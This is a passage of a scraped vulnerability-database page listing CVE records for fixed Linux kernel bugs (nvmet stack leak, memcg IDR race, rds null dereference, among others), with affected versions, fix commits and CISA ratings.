"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nvme/target/core.c",
"drivers/nvme/target/fabrics-cmd-auth.c",
"drivers/nvme/target/fabrics-cmd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "30d35b24b7957922f81cfdaa66f2e1b1e9b9aed2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "10967873b80742261527a071954be8b54f0f8e4d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0990e8a863645496b9e3f91cfcfd63cd95c80319",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cd0c1b8e045a8d2785342b385cb2684d9b48e426",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nvme/target/core.c",
"drivers/nvme/target/fabrics-cmd-auth.c",
"drivers/nvme/target/fabrics-cmd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.101",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.42",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.101",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet: always initialize cqe.result\n\nThe spec doesn\u0027t mandate that the first two double words (aka results)\nfor the command queue entry need to be set to 0 when they are not\nused (not specified). Though, the target implemention returns 0 for TCP\nand FC but not for RDMA.\n\nLet\u0027s make RDMA behave the same and thus explicitly initializing the\nresult field. This prevents leaking any data from the stack."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:36.704Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/30d35b24b7957922f81cfdaa66f2e1b1e9b9aed2"
},
{
"url": "https://git.kernel.org/stable/c/10967873b80742261527a071954be8b54f0f8e4d"
},
{
"url": "https://git.kernel.org/stable/c/0990e8a863645496b9e3f91cfcfd63cd95c80319"
},
{
"url": "https://git.kernel.org/stable/c/cd0c1b8e045a8d2785342b385cb2684d9b48e426"
}
],
"title": "nvmet: always initialize cqe.result",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41079",
"datePublished": "2024-07-29T15:04:16.733Z",
"dateReserved": "2024-07-12T12:17:45.632Z",
"dateUpdated": "2025-05-04T09:21:36.704Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42087 (GCVE-0-2024-42087)
Vulnerability from cvelistv5
Published
2024-07-29 16:26
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/panel: ilitek-ili9881c: Fix warning with GPIO controllers that sleep
The ilitek-ili9881c controls the reset GPIO using the non-sleeping
gpiod_set_value() function. This complains loudly when the GPIO
controller needs to sleep. As the caller can sleep, use
gpiod_set_value_cansleep() to fix the issue.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.306Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b71348be1236398be2d04c5e145fd6eaae86a91b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98686ec1824728ff41d7b358131f7d0227c2ba2a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cae52f61fda0f5d2949dc177f984c9e187d4c6a0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/489f38de3375ab84b3d269d0a1d64d6ee95d7044"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f41401219fbe7663b3cf65ebd4ed95ebbb8ffb9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1618f7a875ffd916596392fd29880c0429b8af60"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e646402bf82145349fcf5dcbe395afaf02a8ce47"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee7860cd8b5763017f8dc785c2851fecb7a0c565"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42087",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:18:50.644704Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:56.865Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/panel/panel-ilitek-ili9881c.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b71348be1236398be2d04c5e145fd6eaae86a91b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "98686ec1824728ff41d7b358131f7d0227c2ba2a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cae52f61fda0f5d2949dc177f984c9e187d4c6a0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "489f38de3375ab84b3d269d0a1d64d6ee95d7044",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5f41401219fbe7663b3cf65ebd4ed95ebbb8ffb9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1618f7a875ffd916596392fd29880c0429b8af60",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e646402bf82145349fcf5dcbe395afaf02a8ce47",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ee7860cd8b5763017f8dc785c2851fecb7a0c565",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/panel/panel-ilitek-ili9881c.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.317",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.317",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/panel: ilitek-ili9881c: Fix warning with GPIO controllers that sleep\n\nThe ilitek-ili9881c controls the reset GPIO using the non-sleeping\ngpiod_set_value() function. This complains loudly when the GPIO\ncontroller needs to sleep. As the caller can sleep, use\ngpiod_set_value_cansleep() to fix the issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:41.931Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b71348be1236398be2d04c5e145fd6eaae86a91b"
},
{
"url": "https://git.kernel.org/stable/c/98686ec1824728ff41d7b358131f7d0227c2ba2a"
},
{
"url": "https://git.kernel.org/stable/c/cae52f61fda0f5d2949dc177f984c9e187d4c6a0"
},
{
"url": "https://git.kernel.org/stable/c/489f38de3375ab84b3d269d0a1d64d6ee95d7044"
},
{
"url": "https://git.kernel.org/stable/c/5f41401219fbe7663b3cf65ebd4ed95ebbb8ffb9"
},
{
"url": "https://git.kernel.org/stable/c/1618f7a875ffd916596392fd29880c0429b8af60"
},
{
"url": "https://git.kernel.org/stable/c/e646402bf82145349fcf5dcbe395afaf02a8ce47"
},
{
"url": "https://git.kernel.org/stable/c/ee7860cd8b5763017f8dc785c2851fecb7a0c565"
}
],
"title": "drm/panel: ilitek-ili9881c: Fix warning with GPIO controllers that sleep",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42087",
"datePublished": "2024-07-29T16:26:27.855Z",
"dateReserved": "2024-07-29T15:50:41.171Z",
"dateUpdated": "2025-05-04T09:22:41.931Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48888 (GCVE-0-2022-48888)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/msm/dpu: Fix memory leak in msm_mdss_parse_data_bus_icc_path
of_icc_get() alloc resources for path1, we should release it when not
need anymore. Early return when IS_ERR_OR_NULL(path0) may leak path1.
Defer getting path1 to fix this.
Patchwork: https://patchwork.freedesktop.org/patch/514264/
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48888",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:32.201976Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:55.428Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/msm/msm_mdss.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c6fa1de83fd87267ab24359e6fa52f98f5cee3f9",
"status": "affected",
"version": "b9364eed9232f3d2a846f68c2307eb25c93cc2d0",
"versionType": "git"
},
{
"lessThan": "45dac1352b55b1d8cb17f218936b2bc2bc1fb4ee",
"status": "affected",
"version": "b9364eed9232f3d2a846f68c2307eb25c93cc2d0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/msm/msm_mdss.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.19"
},
{
"lessThan": "5.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm/dpu: Fix memory leak in msm_mdss_parse_data_bus_icc_path\n\nof_icc_get() alloc resources for path1, we should release it when not\nneed anymore. Early return when IS_ERR_OR_NULL(path0) may leak path1.\nDefer getting path1 to fix this.\n\nPatchwork: https://patchwork.freedesktop.org/patch/514264/"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:31.802Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c6fa1de83fd87267ab24359e6fa52f98f5cee3f9"
},
{
"url": "https://git.kernel.org/stable/c/45dac1352b55b1d8cb17f218936b2bc2bc1fb4ee"
}
],
"title": "drm/msm/dpu: Fix memory leak in msm_mdss_parse_data_bus_icc_path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48888",
"datePublished": "2024-08-21T06:10:20.129Z",
"dateReserved": "2024-08-21T06:06:23.290Z",
"dateUpdated": "2025-05-04T08:25:31.802Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43892 (GCVE-0-2024-43892)
Vulnerability from cvelistv5
Published
2024-08-26 10:10
Modified
2025-05-04 12:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
memcg: protect concurrent access to mem_cgroup_idr
Commit 73f576c04b94 ("mm: memcontrol: fix cgroup creation failure after
many small jobs") decoupled the memcg IDs from the CSS ID space to fix the
cgroup creation failures. It introduced IDR to maintain the memcg ID
space. The IDR depends on external synchronization mechanisms for
modifications. For the mem_cgroup_idr, the idr_alloc() and idr_replace()
happen within css callback and thus are protected through cgroup_mutex
from concurrent modifications. However idr_remove() for mem_cgroup_idr
was not protected against concurrency and can be run concurrently for
different memcgs when they hit their refcnt to zero. Fix that.
We have been seeing list_lru based kernel crashes at a low frequency in
our fleet for a long time. These crashes were in different part of
list_lru code including list_lru_add(), list_lru_del() and reparenting
code. Upon further inspection, it looked like for a given object (dentry
and inode), the super_block's list_lru didn't have list_lru_one for the
memcg of that object. The initial suspicions were either the object is
not allocated through kmem_cache_alloc_lru() or somehow
memcg_list_lru_alloc() failed to allocate list_lru_one() for a memcg but
returned success. No evidence were found for these cases.
Looking more deeply, we started seeing situations where valid memcg's id
is not present in mem_cgroup_idr and in some cases multiple valid memcgs
have same id and mem_cgroup_idr is pointing to one of them. So, the most
reasonable explanation is that these situations can happen due to race
between multiple idr_remove() calls or race between
idr_alloc()/idr_replace() and idr_remove(). These races are causing
multiple memcgs to acquire the same ID and then offlining of one of them
would cleanup list_lrus on the system for all of them. Later access from
other memcgs to the list_lru cause crashes due to missing list_lru_one.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 73f576c04b9410ed19660f74f97521bee6e1c546 Version: 73f576c04b9410ed19660f74f97521bee6e1c546 Version: 73f576c04b9410ed19660f74f97521bee6e1c546 Version: 73f576c04b9410ed19660f74f97521bee6e1c546 Version: 73f576c04b9410ed19660f74f97521bee6e1c546 Version: 73f576c04b9410ed19660f74f97521bee6e1c546 Version: 8627c7750a66a46d56d3564e1e881aa53764497c Version: db70cd18d3da727a3a59694de428a9e41c620de7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43892",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:29:18.942187Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:57.970Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"mm/memcontrol.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "912736a0435ef40e6a4ae78197ccb5553cb80b05",
"status": "affected",
"version": "73f576c04b9410ed19660f74f97521bee6e1c546",
"versionType": "git"
},
{
"lessThan": "e6cc9ff2ac0b5df9f25eb790934c3104f6710278",
"status": "affected",
"version": "73f576c04b9410ed19660f74f97521bee6e1c546",
"versionType": "git"
},
{
"lessThan": "56fd70f4aa8b82199dbe7e99366b1fd7a04d86fb",
"status": "affected",
"version": "73f576c04b9410ed19660f74f97521bee6e1c546",
"versionType": "git"
},
{
"lessThan": "37a060b64ae83b76600d187d76591ce488ab836b",
"status": "affected",
"version": "73f576c04b9410ed19660f74f97521bee6e1c546",
"versionType": "git"
},
{
"lessThan": "51c0b1bb7541f8893ec1accba59eb04361a70946",
"status": "affected",
"version": "73f576c04b9410ed19660f74f97521bee6e1c546",
"versionType": "git"
},
{
"lessThan": "9972605a238339b85bd16b084eed5f18414d22db",
"status": "affected",
"version": "73f576c04b9410ed19660f74f97521bee6e1c546",
"versionType": "git"
},
{
"status": "affected",
"version": "8627c7750a66a46d56d3564e1e881aa53764497c",
"versionType": "git"
},
{
"status": "affected",
"version": "db70cd18d3da727a3a59694de428a9e41c620de7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"mm/memcontrol.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.226",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.167",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.110",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.226",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.167",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.110",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.6.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmemcg: protect concurrent access to mem_cgroup_idr\n\nCommit 73f576c04b94 (\"mm: memcontrol: fix cgroup creation failure after\nmany small jobs\") decoupled the memcg IDs from the CSS ID space to fix the\ncgroup creation failures. It introduced IDR to maintain the memcg ID\nspace. The IDR depends on external synchronization mechanisms for\nmodifications. For the mem_cgroup_idr, the idr_alloc() and idr_replace()\nhappen within css callback and thus are protected through cgroup_mutex\nfrom concurrent modifications. However idr_remove() for mem_cgroup_idr\nwas not protected against concurrency and can be run concurrently for\ndifferent memcgs when they hit their refcnt to zero. Fix that.\n\nWe have been seeing list_lru based kernel crashes at a low frequency in\nour fleet for a long time. These crashes were in different part of\nlist_lru code including list_lru_add(), list_lru_del() and reparenting\ncode. Upon further inspection, it looked like for a given object (dentry\nand inode), the super_block\u0027s list_lru didn\u0027t have list_lru_one for the\nmemcg of that object. The initial suspicions were either the object is\nnot allocated through kmem_cache_alloc_lru() or somehow\nmemcg_list_lru_alloc() failed to allocate list_lru_one() for a memcg but\nreturned success. No evidence were found for these cases.\n\nLooking more deeply, we started seeing situations where valid memcg\u0027s id\nis not present in mem_cgroup_idr and in some cases multiple valid memcgs\nhave same id and mem_cgroup_idr is pointing to one of them. So, the most\nreasonable explanation is that these situations can happen due to race\nbetween multiple idr_remove() calls or race between\nidr_alloc()/idr_replace() and idr_remove(). These races are causing\nmultiple memcgs to acquire the same ID and then offlining of one of them\nwould cleanup list_lrus on the system for all of them. Later access from\nother memcgs to the list_lru cause crashes due to missing list_lru_one."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:58:18.607Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/912736a0435ef40e6a4ae78197ccb5553cb80b05"
},
{
"url": "https://git.kernel.org/stable/c/e6cc9ff2ac0b5df9f25eb790934c3104f6710278"
},
{
"url": "https://git.kernel.org/stable/c/56fd70f4aa8b82199dbe7e99366b1fd7a04d86fb"
},
{
"url": "https://git.kernel.org/stable/c/37a060b64ae83b76600d187d76591ce488ab836b"
},
{
"url": "https://git.kernel.org/stable/c/51c0b1bb7541f8893ec1accba59eb04361a70946"
},
{
"url": "https://git.kernel.org/stable/c/9972605a238339b85bd16b084eed5f18414d22db"
}
],
"title": "memcg: protect concurrent access to mem_cgroup_idr",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43892",
"datePublished": "2024-08-26T10:10:46.612Z",
"dateReserved": "2024-08-17T09:11:59.290Z",
"dateUpdated": "2025-05-04T12:58:18.607Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35902 (GCVE-0-2024-35902)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/rds: fix possible cp null dereference
cp might be null, calling cp->cp_conn would produce null dereference
[Simon Horman adds:]
Analysis:
* cp is a parameter of __rds_rdma_map and is not reassigned.
* The following call-sites pass a NULL cp argument to __rds_rdma_map()
- rds_get_mr()
- rds_get_mr_for_dest
* Prior to the code above, the following assumes that cp may be NULL
(which is indicative, but could itself be unnecessary)
trans_private = rs->rs_transport->get_mr(
sg, nents, rs, &mr->r_key, cp ? cp->cp_conn : NULL,
args->vec.addr, args->vec.bytes,
need_odp ? ODP_ZEROBASED : ODP_NOT_NEEDED);
* The code modified by this patch is guarded by IS_ERR(trans_private),
where trans_private is assigned as per the previous point in this analysis.
The only implementation of get_mr that I could locate is rds_ib_get_mr()
which can return an ERR_PTR if the conn (4th) argument is NULL.
* ret is set to PTR_ERR(trans_private).
rds_ib_get_mr can return ERR_PTR(-ENODEV) if the conn (4th) argument is NULL.
Thus ret may be -ENODEV in which case the code in question will execute.
Conclusion:
* cp may be NULL at the point where this patch adds a check;
this patch does seem to address a possible bug
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 786854141057751bc08eb26f1b02e97c1631c8f4 Version: 997efea2bf3a4adb96c306b9ad6a91442237bf5b Version: 9dfc15a10dfd44f8ff7f27488651cb5be6af83c2 Version: b562ebe21ed9adcf42242797dd6cb75beef12bf0 Version: 998fd719e6d6468b930ac0c44552ea9ff8b07b80 Version: 2b505d05280739ce31d5708da840f42df827cb85 Version: c055fc00c07be1f0df7375ab0036cebd1106ed38 Version: c055fc00c07be1f0df7375ab0036cebd1106ed38 Version: 907761307469adecb02461a14120e9a1812a5fb1 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35902",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:09:14.303997Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:18.553Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
